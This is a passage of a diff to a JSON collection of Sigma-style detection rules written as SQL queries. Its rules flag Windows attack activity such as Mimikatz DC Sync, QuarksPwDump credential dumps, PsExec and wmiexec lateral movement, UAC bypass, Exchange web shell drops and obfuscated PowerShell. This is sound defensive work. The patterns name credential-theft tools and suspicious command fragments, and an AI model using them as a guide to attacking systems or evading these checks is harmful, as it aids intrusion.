"file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": 
"file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { 
- "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": 
"win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" 
], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": 
"304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE 
'%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename 
LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry 
where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE 
'\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE 
'%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue 